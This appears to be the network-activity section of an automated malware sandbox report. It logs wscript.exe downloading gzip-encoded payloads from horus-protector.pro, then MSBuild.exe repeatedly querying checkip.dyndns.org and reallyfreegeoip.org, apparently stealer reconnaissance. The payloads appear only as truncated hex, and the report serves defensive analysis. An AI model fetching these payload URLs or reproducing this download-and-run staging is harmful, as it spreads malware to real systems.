                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                          Jul 25, 2024 09:54:12.446276903 CEST192.168.2.111.1.1.10x6112Standard query (0)horus-protector.proA (IP address)IN (0x0001)false
                          Jul 25, 2024 09:54:38.764331102 CEST192.168.2.111.1.1.10xb855Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                          Jul 25, 2024 09:54:40.072732925 CEST192.168.2.111.1.1.10x4b18Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                          Jul 25, 2024 09:54:12.465069056 CEST1.1.1.1192.168.2.110x6112No error (0)horus-protector.pro104.21.37.117A (IP address)IN (0x0001)false
                          Jul 25, 2024 09:54:12.465069056 CEST1.1.1.1192.168.2.110x6112No error (0)horus-protector.pro172.67.207.214A (IP address)IN (0x0001)false
                          Jul 25, 2024 09:54:31.047532082 CEST1.1.1.1192.168.2.110xb378No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                          Jul 25, 2024 09:54:31.047532082 CEST1.1.1.1192.168.2.110xb378No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                          Jul 25, 2024 09:54:32.197788954 CEST1.1.1.1192.168.2.110x4802No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                          Jul 25, 2024 09:54:32.197788954 CEST1.1.1.1192.168.2.110x4802No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                          Jul 25, 2024 09:54:38.772079945 CEST1.1.1.1192.168.2.110xb855No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                          Jul 25, 2024 09:54:38.772079945 CEST1.1.1.1192.168.2.110xb855No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                          Jul 25, 2024 09:54:38.772079945 CEST1.1.1.1192.168.2.110xb855No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                          Jul 25, 2024 09:54:38.772079945 CEST1.1.1.1192.168.2.110xb855No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                          Jul 25, 2024 09:54:38.772079945 CEST1.1.1.1192.168.2.110xb855No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                          Jul 25, 2024 09:54:38.772079945 CEST1.1.1.1192.168.2.110xb855No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                          Jul 25, 2024 09:54:40.080595970 CEST1.1.1.1192.168.2.110x4b18No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                          Jul 25, 2024 09:54:40.080595970 CEST1.1.1.1192.168.2.110x4b18No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                          • reallyfreegeoip.org
                          • horus-protector.pro
                          • checkip.dyndns.org
                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          0192.168.2.1149711104.21.37.117804084C:\Windows\System32\wscript.exe
                          TimestampBytes transferredDirectionData
                          Jul 25, 2024 09:54:12.476365089 CEST331OUTGET /c/s4.txt HTTP/1.1
                          Accept: */*
                          Accept-Language: en-ch
                          UA-CPU: AMD64
                          Accept-Encoding: gzip, deflate
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                          Host: horus-protector.pro
                          Connection: Keep-Alive
                          Jul 25, 2024 09:54:13.167182922 CEST1236INHTTP/1.1 200 OK
                          Date: Thu, 25 Jul 2024 07:54:13 GMT
                          Content-Type: text/plain
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Last-Modified: Tue, 09 Jul 2024 01:36:32 GMT
                          ETag: W/"7558-61cc68f38c06d"
                          CF-Cache-Status: DYNAMIC
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cKb8F9k%2F9SobQa9WuTHRouLVU4uEkolQ4MnMmzBWrVGDUXiukDfmTuDwU0jjB5FuQQ4dLXU5B50utHBMuWJVsVtrMLk3hpyhEz%2Bls8K2MC1N6vEFyLl2WGxZrMewIhQVO381WzRa"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 8a8a94a6a9ea424f-EWR
                          Content-Encoding: gzip
                          alt-svc: h3=":443"; ma=86400
                          Data Raw: 65 30 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 5a d9 92 ec aa 11 fc 25 41 6d f0 28 b5 a4 ff ff 24 47 56 15 48 dd d3 3d 67 ee 71 d8 0f f6 44 47 8c 06 89 a5 a8 0d c8 84 76 2e bf bf df df ef ef f7 f7 fb fb c7 bf 9d da f8 df 6c be 95 ff 67 9d 10 0b ab 18 f1 2a a6 55 1f 7c 10 29 69 a3 ce 24 0b 6f b4 a8 c9 62 2a ab ee 5a 79 95 8a ef 54 78 e5 a6 6c 6a c6 cc 5d 4d 4f 29 cc 75 d3 cd df 2f bc 4a 53 d6 55 94 aa d2 55 8f 0b 13 f7 d9 af 7f 97 55 1f d6 c4 b4 50 d5 87 ee 4a 52 a4 8a c9 4a 0b 1f d2 64 a5 c2 8a a7 f5 90 6b f4 f3 a5 3f e5 2e 24 ab ad e8 4f ba ee bc 0a 61 9c e8 47 f1 34 29 b6 88 72 e3 ae 9d bb f7 5b a9 eb ae 6c a2 0f 5a 30 ff 6c 47 a2 78 0f f9 d8 b8 df cb ba 69 35 d5 07 9b 32 15 ef 77 25 16 65 c1 7c 42 4f fa 10 95 86 27 f4 f5 55 6e 3c b5 33 f1 41 ac 2b 77 5b a5 eb c1 0f 63 97 b7 93 d2 42 55 ab 42 03 a4 ac 3b f5 d0 27 af 44 d2 6d a1 22 c6 0f 5b 61 44 d8 4f 1b 55 e9 b6 da a2 ab 56 eb a2 7a 30 b4 b6 eb a1 d5 60 39 53 51 e3 dd f5 71 08 8c 58 6d 11 d8 ab 58 e7 ca fa 73 f9 87 de 49 a4 46 7b 51 c8 05 3f 7a [TRUNCATED]
                          Data Ascii: e0eZ%Am($GVH=gqDGv.lg*U|)i$ob*ZyTxlj]MO)u/JSUUUPJRJdk?.$OaG4)r[lZ0lGxi52w%e|BO'Un<3A+w[cBUB;'Dm"[aDOUVz0`9SQqXmXsIF{Q?z?uS%un,EYMuU1z;|Xo=0\ETt%3b&Mre".dUHAV^MgmWM^?{'y`e3J>GWy31-"dk=Eh~>d\Vn|
                          Jul 25, 2024 09:54:13.167401075 CEST1236INData Raw: 7e 93 37 ab 9e f9 7d 67 33 b9 af 2a 6a fc f0 12 73 c9 2f 3b f2 2c 13 17 6b 57 de 65 e3 62 ca 55 8a 46 9d c6 1e 7f 52 64 e5 22 9d d5 fb 2a 52 54 bc e7 c8 15 a8 5f b9 88 78 fb 95 ab 99 92 af 62 18 ab 7a ef e4 2d f9 5a f7 e6 f8 6f e4 13 ff 9e f2 8b
                          Data Ascii: ~7}g3*js/;,kWebUFRd"*RT_xbz-ZoW6W?1o.#B^j^s6VW|>(_/~GYPtsGYn-Ze]?sp.YqJQN=_yeR;73Es
                          Jul 25, 2024 09:54:13.167414904 CEST1236INData Raw: e7 81 30 ff c5 79 a2 6a 42 ce 1f e9 e6 f6 c6 e1 d2 f9 1f e7 65 9a 16 31 92 4f fc 09 2d 42 a9 07 7b 9d 2f e2 f9 3e 5f 5f 5f 22 5f 61 bd 29 e9 2f 44 25 fa 75 9e c4 f9 13 d8 4d 01 4f 07 9e 7f 24 9e dd a1 ff b0 17 de 9b 46 1e fa 27 f1 4c 71 26 84 bc
                          Data Ascii: 0yjBe1O-B{/>___"_a)/D%uMO$F'Lq&!/p.nyuMSU7x8)BcpIGpBE~"OBwT*kiIQs=0MMzOzKx"n)c@wXp8J
                          Jul 25, 2024 09:54:13.168325901 CEST562INData Raw: da b3 be f3 be 88 30 87 fd f2 fb fa 63 ff 89 fb 14 65 f2 f1 e1 2f 93 4f 4e 3e f8 c5 1f 5d 4b 83 c3 9e fe 20 4f fd 4d 7e fc ba 7f 20 c3 df 14 2b e8 6d 5f 8f 7b 82 71 ef ca cf 81 b8 5f 86 13 dd 9b 73 7e 9e 53 71 32 39 94 12 ef 2b 8e f3 ee e8 df ef
                          Data Ascii: 0ce/ON>]K OM~ +m_{q_s~Sq29+NF|s7]u $%)nF}?:v]%QcqnyJs4vyOo/Is);iK\E^zZ8KR{;#
                          Jul 25, 2024 09:54:13.490087986 CEST1236INData Raw: 35 61 62 0d 0a 9c 5c 5b 96 ab 30 0c db 52 21 2f f8 a4 d3 db fd 2f e9 1e 49 76 20 09 d0 e9 7c cd c9 40 20 24 8e 63 5b 52 73 ad bf af da c7 fb f3 75 7d ec 37 da 3d f9 d4 99 9c 64 fa 0d e1 0d e7 f3 c9 3a b9 78 e3 86 c3 8e fb bb b3 03 c3 85 cc ae 2a
                          Data Ascii: 5ab\[0R!//Iv |@ $c[Rsu}7=d:x*n3;^!~'79ROg_O_7C7lyr}Fy~lm]D>5_j<uo<L}5s_.]j-.Y
                          Jul 25, 2024 09:54:13.490371943 CEST222INData Raw: c8 21 13 1f 63 26 8f 50 fc b7 90 0b d9 76 64 4d 05 f1 d9 fe 39 5e 95 aa 12 d9 78 41 73 55 aa a9 fd 70 fd ee ae 6c d7 fa ec 7a 6d d3 e8 e9 fa 4f 55 3c ac be 7e 3b a6 58 31 d8 bd 9d 8d f7 e2 ed 58 bf 7f 35 46 5c 71 7b 41 1b ec 02 e7 ad 7a 3b 97 52
                          Data Ascii: !c&PvdM9^xAsUplzmOU<~;X1X5F\q{Az;Rpc3Lj=x0{{!M]XnK$UM(VXCBO)/:@W]4mM}V:
                          Jul 25, 2024 09:54:13.490475893 CEST1236INData Raw: 62 37 65 0d 0a bc 5d 47 92 e4 38 0c fc 52 89 0e e4 51 94 4a ff 7f d2 06 12 86 a6 aa c7 6c c4 6e f4 61 9a 23 89 16 04 01 30 91 dd d6 e7 cb 78 ae b9 bf e5 e4 f9 84 dd d9 a0 8f 38 51 94 96 f1 4a 59 51 fb 05 fb 2f b5 f5 39 63 49 80 ca e3 fb 7b 82 3c
                          Data Ascii: b7e]G8RQJlna#0x8QJYQ/9cI{<[{)G9"'B9tmeO|aF2+0__C?c}Qs-9_x/Y]{HMio^r?%E_d0'OuG!K9]
                          Jul 25, 2024 09:54:13.490945101 CEST1236INData Raw: 78 98 c4 0b 7c d7 66 c5 c6 c6 b1 ff 75 7c 4d a2 2b 12 ff f2 f8 9e 94 1b fc 81 51 66 94 20 f7 0f f9 38 51 ec fd 17 32 e8 a4 4c 76 1e 69 7b 45 f0 d6 5e 7f d3 7c 8d 87 f5 3a 25 64 fe 57 a9 4f 22 26 d6 1f 7d ce eb 7b 26 e3 c3 78 e1 e4 88 53 fd 4d fc
                          Data Ascii: x|fu|M+Qf 8Q2Lvi{E^|:%dWO"&}{&xSMA/?3y*1&vW&u| xv/+?NWGS}Tx1+ <n[qc>OOa{'9el=Gg|]rsu?rnFe
                          Jul 25, 2024 09:54:13.490968943 CEST497INData Raw: b9 fe 1a 7a 90 06 fe e1 f3 fc b3 fa 8b ee 97 c9 c2 94 a8 90 4a f6 a1 f6 c4 39 ed ef 86 5d ed f1 62 e3 ee 56 4e 7f ad 0f 96 4f e4 a8 01 b0 43 d3 7e 66 2d 90 f3 68 6f eb ff 64 ff c3 aa 68 bf 3a bf 4b 43 7e b4 47 c7 37 fb 69 f1 0f 84 27 28 dd b0 ef
                          Data Ascii: zJ9]bVNOC~f-hodh:KC~G7i'(>$?eYy5O['e;q|i%wtzaQ@"T}Iz8L,t,vBC^!g=U+:]]}Q<.cPD:CVj~/
                          Jul 25, 2024 09:54:13.490983963 CEST497INData Raw: b9 fe 1a 7a 90 06 fe e1 f3 fc b3 fa 8b ee 97 c9 c2 94 a8 90 4a f6 a1 f6 c4 39 ed ef 86 5d ed f1 62 e3 ee 56 4e 7f ad 0f 96 4f e4 a8 01 b0 43 d3 7e 66 2d 90 f3 68 6f eb ff 64 ff c3 aa 68 bf 3a bf 4b 43 7e b4 47 c7 37 fb 69 f1 0f 84 27 28 dd b0 ef
                          Data Ascii: zJ9]bVNOC~f-hodh:KC~G7i'(>$?eYy5O['e;q|i%wtzaQ@"T}Iz8L,t,vBC^!g=U+:]]}Q<.cPD:CVj~/
                          Jul 25, 2024 09:54:13.509803057 CEST331OUTGET /c/r4.txt HTTP/1.1
                          Accept: */*
                          Accept-Language: en-ch
                          UA-CPU: AMD64
                          Accept-Encoding: gzip, deflate
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                          Host: horus-protector.pro
                          Connection: Keep-Alive
                          Jul 25, 2024 09:54:13.718326092 CEST1236INHTTP/1.1 200 OK
                          Date: Thu, 25 Jul 2024 07:54:13 GMT
                          Content-Type: text/plain
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Last-Modified: Tue, 09 Jul 2024 01:36:09 GMT
                          ETag: W/"9800-61cc68dd90824"
                          CF-Cache-Status: DYNAMIC
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ns8GburWRhtuPEvMeUWnNR2wYmWQbeZgXs6si604OAAgFpNp%2FT8hnWmafpjFfprQkrRJJn60hqogpVsgSW85TecoH5npAGqExxQUwMKXs6l6k4%2FWJX4bp%2BmGa6iLUgQebX2ZlLLX"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 8a8a94aacc48424f-EWR
                          Content-Encoding: gzip
                          alt-svc: h3=":443"; ma=86400
                          Data Raw: 37 34 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 58 59 92 e3 36 0c bd 12 76 90 9f b6 44 dd ff 48 29 00 a4 24 bb dd 99 49 25 95 7c a4 e5 92 45 71 c1 f2 f0 00 d2 06 f8 b9 7e ae 9f eb ff 70 11 cb 5e ad ad 1e f6 bf 87 84 01 06 7d 7d 22 d7 f0 30 80 c3 00 ba 01 b0 03 90 03 a8 01 98 06 9c 00 dd 01 36 03 20 03 d8 ad c6 62 5e dc 28 00 08 00 2d 6e fe fb fa 24 e4 86 0e 07 90 39 2f c6 41 2f 3d 32 e5 a4 3c af 3b ec 08 59 ee b5 26 d6 8e a9 c3 f5 82 42 a7 0f 18 e3 f2 6b 7d db cd af c0 60 5b b2 e9 af eb 7f d1 3d 71 dc e6 1c 93 6a e3 7d dd 7c 86 3d c7 c4 39 be 9a 7c 08 b1 03 3c e7 5c bc c5 49 a6 cc e8 17 bd 74 f8 d2 3f e5 c6 fd a0 92 15 f8 12 57 dc f2 49 93 07 8f 7a 06 66 ed cd be 3e 71 08 df 79 da f7 3b f3 be b3 87 6e 7e fe a3 b8 bf e1 bc b8 17 b6 e6 ba 1b ce 20 bf c7 e7 5f 71 fa 3d ce 8b c7 f0 37 78 7c d7 27 73 ed c2 98 a7 0d e9 97 7c d6 9f b5 f1 03 8f de b1 ea 13 97 78 0f 1d bb 5d b1 5b bc 21 fa ca c5 85 e7 92 f7 69 dd 03 2f 7c a3 b6 c8 e4 dc fb 5d d3 28 b9 14 57 c8 31 bb e2 f5 ee 9f df 30 a3 69 0b eb 25 67 0b 62 [TRUNCATED]
                          Data Ascii: 74cXY6vDH)$I%|Eq~p^}}"06 b^(-n$9/A/=2<;Y&Bk}`[=qj}|=9|<\It?WIzf>qy;n~ _q=7x|'s|x][!i/|](W10i%gb=_m~LrhA'7eK;Nuxoc1QGZcN5Mf6Y9\Jqun 55vq97y%[hH>kndj">M+LLlxSvaj)%f&j>xewl$:0=
                          Jul 25, 2024 09:54:13.718525887 CEST224INData Raw: a0 93 1a ab 08 2b e9 6f 44 e3 db 4b a4 10 22 3b 0b aa bd d6 57 80 7d 3f c0 99 8f b7 95 4f 50 11 94 f5 fd 1d fc 12 be a9 1a 1b b9 46 74 5d 8d 34 d0 e8 96 b8 38 e9 a0 e8 7d 9d 31 68 0f c4 9d bd 3b 2b 53 e7 c6 c0 6a c2 cc 9d 91 8d 95 d9 94 d1 9c 9d
                          Data Ascii: +oDK";W}?OPFt]48}1h;+SjvvW{[A6\\]mq!nKT2/FkFzWmo+\y6su/TusTK[7>9oexxYYB`[yHD


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          1192.168.2.1164398132.226.247.73807880C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                          TimestampBytes transferredDirectionData
                          Jul 25, 2024 09:54:38.783755064 CEST151OUTGET / HTTP/1.1
                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                          Host: checkip.dyndns.org
                          Connection: Keep-Alive
                          Jul 25, 2024 09:54:39.456392050 CEST320INHTTP/1.1 200 OK
                          Date: Thu, 25 Jul 2024 07:54:39 GMT
                          Content-Type: text/html
                          Content-Length: 103
                          Connection: keep-alive
                          Cache-Control: no-cache
                          Pragma: no-cache
                          X-Request-ID: 7914ea1890272242b09df6fc939a908d
                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                          Jul 25, 2024 09:54:39.470530033 CEST127OUTGET / HTTP/1.1
                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                          Host: checkip.dyndns.org
                          Jul 25, 2024 09:54:39.677747965 CEST320INHTTP/1.1 200 OK
                          Date: Thu, 25 Jul 2024 07:54:39 GMT
                          Content-Type: text/html
                          Content-Length: 103
                          Connection: keep-alive
                          Cache-Control: no-cache
                          Pragma: no-cache
                          X-Request-ID: cad18b7774ff950e37401d76eb2fbea5
                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                          Jul 25, 2024 09:54:40.837368965 CEST127OUTGET / HTTP/1.1
                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                          Host: checkip.dyndns.org
                          Jul 25, 2024 09:54:41.042892933 CEST320INHTTP/1.1 200 OK
                          Date: Thu, 25 Jul 2024 07:54:40 GMT
                          Content-Type: text/html
                          Content-Length: 103
                          Connection: keep-alive
                          Cache-Control: no-cache
                          Pragma: no-cache
                          X-Request-ID: df9168c3871335d5c02dcb4b57aaaac7
                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          2192.168.2.1164402132.226.247.73807880C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                          TimestampBytes transferredDirectionData
                          Jul 25, 2024 09:54:41.715010881 CEST127OUTGET / HTTP/1.1
                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                          Host: checkip.dyndns.org
                          Jul 25, 2024 09:54:42.424376965 CEST320INHTTP/1.1 200 OK
                          Date: Thu, 25 Jul 2024 07:54:42 GMT
                          Content-Type: text/html
                          Content-Length: 103
                          Connection: keep-alive
                          Cache-Control: no-cache
                          Pragma: no-cache
                          X-Request-ID: 37d9ae9f959b5729d64cc3a9edd4ef28
                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          3192.168.2.1164406132.226.247.73807880C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                          TimestampBytes transferredDirectionData
                          Jul 25, 2024 09:54:43.106553078 CEST151OUTGET / HTTP/1.1
                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                          Host: checkip.dyndns.org
                          Connection: Keep-Alive
                          Jul 25, 2024 09:54:43.821763992 CEST320INHTTP/1.1 200 OK
                          Date: Thu, 25 Jul 2024 07:54:43 GMT
                          Content-Type: text/html
                          Content-Length: 103
                          Connection: keep-alive
                          Cache-Control: no-cache
                          Pragma: no-cache
                          X-Request-ID: 4cb76c424e6d8dc7a9e392969dad307c
                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          4192.168.2.1164408132.226.247.73807880C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                          TimestampBytes transferredDirectionData
                          Jul 25, 2024 09:54:44.462959051 CEST151OUTGET / HTTP/1.1
                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                          Host: checkip.dyndns.org
                          Connection: Keep-Alive
                          Jul 25, 2024 09:54:45.162084103 CEST320INHTTP/1.1 200 OK
                          Date: Thu, 25 Jul 2024 07:54:45 GMT
                          Content-Type: text/html
                          Content-Length: 103
                          Connection: keep-alive
                          Cache-Control: no-cache
                          Pragma: no-cache
                          X-Request-ID: a9afea6fdd8d105704b666451b4ef5f2
                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          5192.168.2.1164411132.226.247.73807880C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                          TimestampBytes transferredDirectionData
                          Jul 25, 2024 09:54:45.791760921 CEST151OUTGET / HTTP/1.1
                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                          Host: checkip.dyndns.org
                          Connection: Keep-Alive
                          Jul 25, 2024 09:54:46.499396086 CEST320INHTTP/1.1 200 OK
                          Date: Thu, 25 Jul 2024 07:54:46 GMT
                          Content-Type: text/html
                          Content-Length: 103
                          Connection: keep-alive
                          Cache-Control: no-cache
                          Pragma: no-cache
                          X-Request-ID: 1bf6424da89a17f395f9588d97067e50
                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          6192.168.2.1164414132.226.247.73807880C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                          TimestampBytes transferredDirectionData
                          Jul 25, 2024 09:54:47.211688042 CEST151OUTGET / HTTP/1.1
                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                          Host: checkip.dyndns.org
                          Connection: Keep-Alive
                          Jul 25, 2024 09:54:47.906349897 CEST320INHTTP/1.1 200 OK
                          Date: Thu, 25 Jul 2024 07:54:47 GMT
                          Content-Type: text/html
                          Content-Length: 103
                          Connection: keep-alive
                          Cache-Control: no-cache
                          Pragma: no-cache
                          X-Request-ID: ad22cca9d7ad335be3cc7e394e7c240f
                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          7192.168.2.1164417132.226.247.73807880C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                          TimestampBytes transferredDirectionData
                          Jul 25, 2024 09:54:48.610006094 CEST151OUTGET / HTTP/1.1
                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                          Host: checkip.dyndns.org
                          Connection: Keep-Alive
                          Jul 25, 2024 09:54:49.329843998 CEST320INHTTP/1.1 200 OK
                          Date: Thu, 25 Jul 2024 07:54:49 GMT
                          Content-Type: text/html
                          Content-Length: 103
                          Connection: keep-alive
                          Cache-Control: no-cache
                          Pragma: no-cache
                          X-Request-ID: 0a66ca8994435c82ea44ec7239bb24ce
                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          0192.168.2.1164399188.114.97.34437880C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                          TimestampBytes transferredDirectionData
                          2024-07-25 07:54:40 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                          Host: reallyfreegeoip.org
                          Connection: Keep-Alive
                          2024-07-25 07:54:40 UTC710INHTTP/1.1 200 OK
                          Date: Thu, 25 Jul 2024 07:54:40 GMT
                          Content-Type: application/xml
                          Transfer-Encoding: chunked
                          Connection: close
                          access-control-allow-origin: *
                          vary: Accept-Encoding
                          Cache-Control: max-age=86400
                          CF-Cache-Status: HIT
                          Age: 22803
                          Last-Modified: Thu, 25 Jul 2024 01:34:37 GMT
